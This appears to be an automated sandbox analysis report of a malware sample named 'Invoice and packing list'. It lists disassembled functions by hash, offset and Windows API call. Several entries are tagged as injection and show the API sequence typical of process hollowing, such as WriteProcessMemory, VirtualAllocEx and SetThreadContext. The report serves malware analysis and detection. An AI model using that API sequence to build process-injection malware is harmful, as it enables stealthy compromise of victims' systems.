Opcode ID: 6e494ae873abfd5988d1bfcc58160fb46ba62fe63297d800905963aaedee0460
Instruction ID: 73cc0ad0943f0a62925072bdd55e84ba75e5f4681823d294a18350588a4dd318
Opcode Fuzzy Hash: 6e494ae873abfd5988d1bfcc58160fb46ba62fe63297d800905963aaedee0460
Instruction Fuzzy Hash: CF41F5B1D00619CFDB24CFA9C8857DEBBB5BF85304F20815AD408AB251DB756945CF51

Function 00E04514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E059C9

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 63842262d641faa2d6baa4a1896b2d02b4bbc6db868226108685a4565f080065
Instruction ID: 4db28e46990846c2946097bfcbf154659beffaeed3ef9cd23f554a31272be870
Opcode Fuzzy Hash: 63842262d641faa2d6baa4a1896b2d02b4bbc6db868226108685a4565f080065
Instruction Fuzzy Hash: 4241E2B1D00719CBDB24CFA9C8847DEBBB5BF49304F60805AD408AB291DB756985CF91

Function 00E05A84 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a88a130fd9c681e794b4f8885f08f957a678b763c73e95352a6c80a4edbf3b1
Instruction ID: feb15accc08bdcb56013133299bf727e94a6e8fdc18de4dc3ff55033252aebd6
Opcode Fuzzy Hash: 6a88a130fd9c681e794b4f8885f08f957a678b763c73e95352a6c80a4edbf3b1
Instruction Fuzzy Hash: 2131D072804749CFDB10CBA8C8453EEBBF0EF96314F64818AC455AB291C775A98ACF41

Function 071AB0B1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071AB148

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ec7b649c08501e28c2dd50a6394f58ee2b18175a834abf5e3d670b87533d44dd
Instruction ID: 535304eeb2e0ec541576e99c2c1fd93360297eceb1d116794b8bdac49c42954e
Opcode Fuzzy Hash: ec7b649c08501e28c2dd50a6394f58ee2b18175a834abf5e3d670b87533d44dd
Instruction Fuzzy Hash: 412148B5D003499FCB10CFA9C885BDEBBF5FF48310F108829E959A7240D7799545CBA1

Function 051D4F70 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 051D500F

Memory Dump Source

Source File: 00000000.00000002.2067258723.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51d0000_Invoice and packing list.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 8621576101f69021daf5c624f20dd4e06b3d1892df11bed86224b8aec81d437a
Instruction ID: 0f3e19d92f655a9a026391be8bb44ee92c62cd8fe1599c714beabea6298daaaf
Opcode Fuzzy Hash: 8621576101f69021daf5c624f20dd4e06b3d1892df11bed86224b8aec81d437a
Instruction Fuzzy Hash: 4331EEB5D003099FDB10CF9AD884ADEFBF9FB48320F14842AE919A7210D775A944CFA0

Function 071AB0B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071AB148

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cf3eda311d211889f3124bfe044b69a89bc72f70a8c5d22ea2bcb839874b132d
Instruction ID: dc783350dbecfc9701a0efb3a461bdaaeb1dd1d2b1629ee2a4979e3806949b03
Opcode Fuzzy Hash: cf3eda311d211889f3124bfe044b69a89bc72f70a8c5d22ea2bcb839874b132d
Instruction Fuzzy Hash: 56214AB5D003499FCB10CFA9D985BDEBBF5FF48310F108429E919A7240D7799945CBA1

Function 051D4F78 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 051D500F

Memory Dump Source

Source File: 00000000.00000002.2067258723.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51d0000_Invoice and packing list.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 7c6016facee551521d3a1572ac925ca9ef53c957aeb1e7b017f169aa2237adab
Instruction ID: e84e1cd0d6024540212b1c2b3aa61c52c238b7165ab3fc13e429f8c94d01acd7
Opcode Fuzzy Hash: 7c6016facee551521d3a1572ac925ca9ef53c957aeb1e7b017f169aa2237adab
Instruction Fuzzy Hash: 0B21AEB5D013099FDB10CF9AD884A9EFBF9FB48320F14842AE919A7210D775A944CFA5

Function 071AB1A1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071AB228

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3e7c17a72bd05e4ae8111424984f251bc298452b73da938e48834e4815541d06
Instruction ID: 94da3117620afe31af5d80eac0ef201db14a52bdf23d7aafb1f5437aa90ec763
Opcode Fuzzy Hash: 3e7c17a72bd05e4ae8111424984f251bc298452b73da938e48834e4815541d06
Instruction Fuzzy Hash: 0E2139B1C002499FDB10DF9AC845ADEFBF5FF48310F10842EE559A7240D739A545CBA1

Function 071AAF18 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071AAF9E

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ab46d856d407c7f7ab9e655008cd23cda099955f9b1526c6c36f7463810a6672
Instruction ID: 4dd185d35535e4b13827ee70e16d1651ed72039ec669d76cecced193733f4f69
Opcode Fuzzy Hash: ab46d856d407c7f7ab9e655008cd23cda099955f9b1526c6c36f7463810a6672
Instruction Fuzzy Hash: 9F2138B5D0020A9FDB14DFAAC4857EEBBF4EF88314F10C42AD459A7240D778A945CFA1

Function 00E0D738 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E0D7C7

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 810d42f13cb5c82c5f7c7393af74119342930356ea7273c844b0b0ca9c60570a
Instruction ID: 64fa59458dd5f831ff7436e0d2111f75c7d5ed3ed89925b0d254a64ab0a7b19d
Opcode Fuzzy Hash: 810d42f13cb5c82c5f7c7393af74119342930356ea7273c844b0b0ca9c60570a
Instruction Fuzzy Hash: 2F2103B5D00249AFDB10CFAAD884ADEBFF4EB48310F14841AE958B3750D379A944CF61

Function 071AB1A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071AB228

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a9148ae47c8f354d911f35b3fc2f2b34a4a8378201dfad7b83de986ee25d3a8f
Instruction ID: 099f15e347e7be36353ae35a2b793068f6a10573b6bc2795865fb28f7f2f5eb8
Opcode Fuzzy Hash: a9148ae47c8f354d911f35b3fc2f2b34a4a8378201dfad7b83de986ee25d3a8f
Instruction Fuzzy Hash: 0A2139B1C003499FDB10DFAAC845AEEFBF5FF48310F10842AE519A7240D739A545DBA1

Function 071AAF20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071AAF9E

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: efebe22590725f6ca091422144c8f6d4a95c19cb0183cfdfb4b79c677808ebda
Instruction ID: dffb6215ee9abd172246f59ddba5a91e2743f87f4b5883f40eed5e8084ce6c2f
Opcode Fuzzy Hash: efebe22590725f6ca091422144c8f6d4a95c19cb0183cfdfb4b79c677808ebda
Instruction Fuzzy Hash: 862138B5D0030A9FDB14DFAAC4857EEBBF4EF88314F10842AD419A7240D778A945CFA1

Function 00E0D740 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E0D7C7

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f8f6b002a649c6170b736aba79865a563ac45dab48033769feccbc7f67b53cde
Instruction ID: 1007004b57b7cb9e964218e8723104f9eefdcdf9b2cd5a2458c735a93b5f4b67
Opcode Fuzzy Hash: f8f6b002a649c6170b736aba79865a563ac45dab48033769feccbc7f67b53cde
Instruction Fuzzy Hash: 5D21C2B5D002499FDB10CFAAD984ADEBBF8EB48310F14841AE958B3350D379A954CFA5

Function 071AAFF0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071AB066

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ce6ccdefd16b4a1ad3c0a47194e2f9c4ccd66e6053259fecc47fc398de50c6a8
Instruction ID: bae4bd8673154c90e4f04555553645c044b1e0dc86d9aa5153e1e72f0cc6a3b8
Opcode Fuzzy Hash: ce6ccdefd16b4a1ad3c0a47194e2f9c4ccd66e6053259fecc47fc398de50c6a8
Instruction Fuzzy Hash: D81147B5C002499FCB20DFAAC845ADEBFF5EF88320F20881AE559A7250D775A544CFA1

Function 071AA5F8 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 071AA662

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d230ade38a4e17a8d5cfa9dffccabc049f039db0d52803662aaea6e6123fe43b
Instruction ID: 9afff2536e59daf1dd0cd48f8a5a37e2bc7d4429cd79d9f6a4b7c9b25de30ba2
Opcode Fuzzy Hash: d230ade38a4e17a8d5cfa9dffccabc049f039db0d52803662aaea6e6123fe43b
Instruction Fuzzy Hash: A91134B5D002498FCB20DFAAC4457AEFBF4AF88324F20881AD459A7240D779A945CFA5

Function 071AAFF8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071AB066

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e74135e40d86f4825c140b3d61b8199272b97391132a2a32c4105e9ba1aa0485
Instruction ID: 6549bc8e800b6bf6d6bb1c3a2d7b7421b97500dcbf3a57988d1557961b237270
Opcode Fuzzy Hash: e74135e40d86f4825c140b3d61b8199272b97391132a2a32c4105e9ba1aa0485
Instruction Fuzzy Hash: AE1126B5D002499FCB20DFAAC945ADFBFF5EB88320F208819E519A7250C775A544CBA1

Function 071AF9D9 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 071AFA3D

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 97251bb2c20d6fedc5635372a4d3ae3f9fd109ec4c2fa2c03a5aa0482c771c52
Instruction ID: 0d0e905888d54f400196386672d65d8f48caf60d480789f20fec374576eec91f
Opcode Fuzzy Hash: 97251bb2c20d6fedc5635372a4d3ae3f9fd109ec4c2fa2c03a5aa0482c771c52
Instruction Fuzzy Hash: C811F8B58003499FDB10DF9AD949BDEFFF8EB48310F20881AE558A7650D375A544CFA1

Function 071AA600 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 071AA662

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 24e3dc273d4cceee66f4ad5ecc7f681f4100a0f64977213adb16df954c764bed
Instruction ID: d3c9b890d068881798d6a8197989e6078d463dbdab19b5a1a5b9ada52083300a
Opcode Fuzzy Hash: 24e3dc273d4cceee66f4ad5ecc7f681f4100a0f64977213adb16df954c764bed
Instruction Fuzzy Hash: D01158B1D003498BCB10DFAAC4457EEFBF4AF88324F208819C419A7240D739A944CFA1

Function 071A7C38 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 071AFA3D

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0bd4a63ea9af538f13c7673fa656798c87ea65fa9f3b54b0d1211207f05f0e82
Instruction ID: 11ca3e86c427368b0195295ea791523488ff93fa780734100fccb4abdb919a0f
Opcode Fuzzy Hash: 0bd4a63ea9af538f13c7673fa656798c87ea65fa9f3b54b0d1211207f05f0e82
Instruction Fuzzy Hash: 541103B9810349AFDB10DF9AD549BDEFBF8EB48310F108419E518A7250D375A945CFA1

Function 00E0B460 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E0B4C6

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b0919f8fe986ac744d4c3fae8aabb7ffe589299383e3f95c45d35265a7a21a8f
Instruction ID: a3389ff5bba025e05211d8c7641f76130e2bd558eb5da40020ec1bfe5193cd9e
Opcode Fuzzy Hash: b0919f8fe986ac744d4c3fae8aabb7ffe589299383e3f95c45d35265a7a21a8f
Instruction Fuzzy Hash: 9811E0B5C002498FDB10DF9AD444ADEFBF8EF88324F10842AD469B7651D379A645CFA1

Function 08D5A7B9 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

Haq, xrefs: 08D5A85C

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 71f5efa97e6bf8722d044d1a40924076e4041ce2fadd40baa821290eca39d0e1
Instruction ID: e03ce5b60277f8f60f61ea58f7195a21a012f46aa95165268398f1a9504565bf
Opcode Fuzzy Hash: 71f5efa97e6bf8722d044d1a40924076e4041ce2fadd40baa821290eca39d0e1
Instruction Fuzzy Hash: 97314871904268EFEB029B749C117ED7FB5EF85342F1086A7E845EB280EB348E02DB51

Function 08D5FE7F Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

4']q, xrefs: 08D5FED9

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 31aceb90a1a7297e80fd1e58a5ec09d245eec35c993f56ac848b24ef9152e6fa
Instruction ID: 90d7bbdadbede5b2dde8afeb6bc5307f54681523747761043f0995a6a5db244b
Opcode Fuzzy Hash: 31aceb90a1a7297e80fd1e58a5ec09d245eec35c993f56ac848b24ef9152e6fa
Instruction Fuzzy Hash: 13218D78A4030A8FDB04EFA4D9507A9BBB1FF85308F208515E50A77781EB706995CBA1

Function 08D5FE90 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

4']q, xrefs: 08D5FED9

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: caee3a7fbbd76ec7c3ba34d47aea6aea6c4bb5927b36c71e6122ecfa978d4de0
Instruction ID: 1aef6853a8403373b10c7598fbf49fd172fea0fe63707df8f52516215a70b584
Opcode Fuzzy Hash: caee3a7fbbd76ec7c3ba34d47aea6aea6c4bb5927b36c71e6122ecfa978d4de0
Instruction Fuzzy Hash: 31216074A5030A8BDB04FBA4D9507ADB7B1FF85308F108515E50A77340EB707555CFA1

Function 08D5B468 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9b063e91f1f2eda160a2b18421e3e98d5a5eee8a662c705c7dbf67cea2fc73
Instruction ID: 1c53abed5de5a707f39d06b31c3436279961ba4c328b0082954f298ba1b97b1c
Opcode Fuzzy Hash: 3c9b063e91f1f2eda160a2b18421e3e98d5a5eee8a662c705c7dbf67cea2fc73
Instruction Fuzzy Hash: 22B19D356002199FCF05EF68D894AAE7BA6FF88351F14852AFC069B390DB30DD52CB90

Function 08D5F561 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5420397f99c4fd01af9597a27b284ddd8a2a9d68199b7c86f75723bea6c07a78
Instruction ID: 063db5a750cf61faf57140524cc14d761d5505d7377c30e5b1cc1bf475124093
Opcode Fuzzy Hash: 5420397f99c4fd01af9597a27b284ddd8a2a9d68199b7c86f75723bea6c07a78
Instruction Fuzzy Hash: 6AA18F75A00205CFCF05DF68D894AAEBBB1FF48751F1586AAE845DB3A1CB31E842CB50

Function 08D5AE40 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41acd6a3cbbffc5351e1f5a17dbe07d064120d04d35b8efe4a39522f10e222c7
Instruction ID: 622e6f79a76c5136b284162c193ba541808d421d06a0d90a3d16dce0b2b81afe
Opcode Fuzzy Hash: 41acd6a3cbbffc5351e1f5a17dbe07d064120d04d35b8efe4a39522f10e222c7
Instruction Fuzzy Hash: EF513934A00128DFDF05DF64D858A9D7BB2EF88352F14866AF902A7390CB719D81CFA0

Function 08D5B262 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e396d87d5c09ba8b02129bcbef26b59caa0dc33785dacb3479691f681aa64107
Instruction ID: f5e5404e2ab922b2d78107993747d469748baea6c564af3c909a7ddf3dd42963
Opcode Fuzzy Hash: e396d87d5c09ba8b02129bcbef26b59caa0dc33785dacb3479691f681aa64107
Instruction Fuzzy Hash: 9141A335B00619CFDF20DFA9D884A6E7BB5EF842A2F05426BEC45D7351DB30E9418BA1

Function 08D5B5A7 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19abd1fe575c389896a7995a162f86026fbb587296d101f1251ea18274e90c56
Instruction ID: fd6c2c16dd02f1e43aacfec70aa798b792fcebb86df7bc481aa6a2e026b5953c
Opcode Fuzzy Hash: 19abd1fe575c389896a7995a162f86026fbb587296d101f1251ea18274e90c56
Instruction Fuzzy Hash: 90416C3060021ADFDF069F64D8949AE7BA6FF84751F14862AFC019B290DB34DC92CB90

Function 08D596E0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 496fc5e05b7a481f47ec7bb6be3fbb420f041a7eca1d6a8decf85fcc7c832129
Instruction ID: b7fa0e0332d27ae31e19b336e94bfc131913272298216bb547b4b857640f1981
Opcode Fuzzy Hash: 496fc5e05b7a481f47ec7bb6be3fbb420f041a7eca1d6a8decf85fcc7c832129
Instruction Fuzzy Hash: EC411775E01208EFCF04CFA9D854AEDBBF2EF89311F14856AE815A7351D7349A42CB90

Function 08D5FCD9 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8ea92e12f9ca969e3806eaa7e4287fdff9980e22704ce2f6ca1a1cbaaa2f45
Instruction ID: ef9d6abed28d9ee7af78a8ef6bac2957713ed68d7031d5c06cbea3a60444c1b9
Opcode Fuzzy Hash: 7c8ea92e12f9ca969e3806eaa7e4287fdff9980e22704ce2f6ca1a1cbaaa2f45
Instruction Fuzzy Hash: 93418C76A007458BDF00EF14D48039A73A2EF41318F198479DC0C7F286DBB2794A8BA2

Function 08D5FCE8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2eef2ca898e06bf6c01499ef2a8df437cc1413012ad3f267868392f8b12a487
Instruction ID: 6063662f528e615ade0c30efe19b801ad6586247a0553aa2a3ec0adc9a3b1d6c
Opcode Fuzzy Hash: c2eef2ca898e06bf6c01499ef2a8df437cc1413012ad3f267868392f8b12a487
Instruction Fuzzy Hash: 4D419F35A003058ADF10EF18D48139B73A2EF41358F158479DC0D7F286DBB1B98ACBA1

Function 08D592D8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f709efda714b99fc57c9c3b19b87d3e11efc846f1f40b2044f66fef9d5a707
Instruction ID: ca5bca4bc9c82e341d8af59e7686786f3b96d94c7f69edf6180f6ecb55c7f7a2
Opcode Fuzzy Hash: 24f709efda714b99fc57c9c3b19b87d3e11efc846f1f40b2044f66fef9d5a707
Instruction Fuzzy Hash: 63313775E01209EFCB05CFA8D8549EEBFB2EF89310F10842AE805A7361DB319902DB90

Function 0C6E0DF8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070992443.000000000C6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c6e0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb919e46dde91b5af5fbdb42cd7525c58e51cf776b4be550b05c5984be2f0bd0
Instruction ID: e365c7c7424055b9d25a231eaf3da01b973da3e60e392ccbd6a1e09cc9ef2075
Opcode Fuzzy Hash: bb919e46dde91b5af5fbdb42cd7525c58e51cf776b4be550b05c5984be2f0bd0
Instruction Fuzzy Hash: F4314670D06259CFCB14CFA9D8487FDBBB5BB4A311F04946AD409B3241D3B80A46DFA5

Function 08D59C39 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae1b5422018b7b1fe23b04348d2655a01472b162c7899bb8808a03b08b96638
Instruction ID: e03e7be7e5e161346fd26435c7a894b276e2d2a589be847faa5a55cf55e743cf
Opcode Fuzzy Hash: 1ae1b5422018b7b1fe23b04348d2655a01472b162c7899bb8808a03b08b96638
Instruction Fuzzy Hash: F5313535D01208EFCB04DFA8D858AEEFBB1FF49301F04816AE905A7261C7359A80DFA0

Function 0C6E0E08 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070992443.000000000C6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C6E0000, based on PE: false

Joe Sandbox IDA Plugin

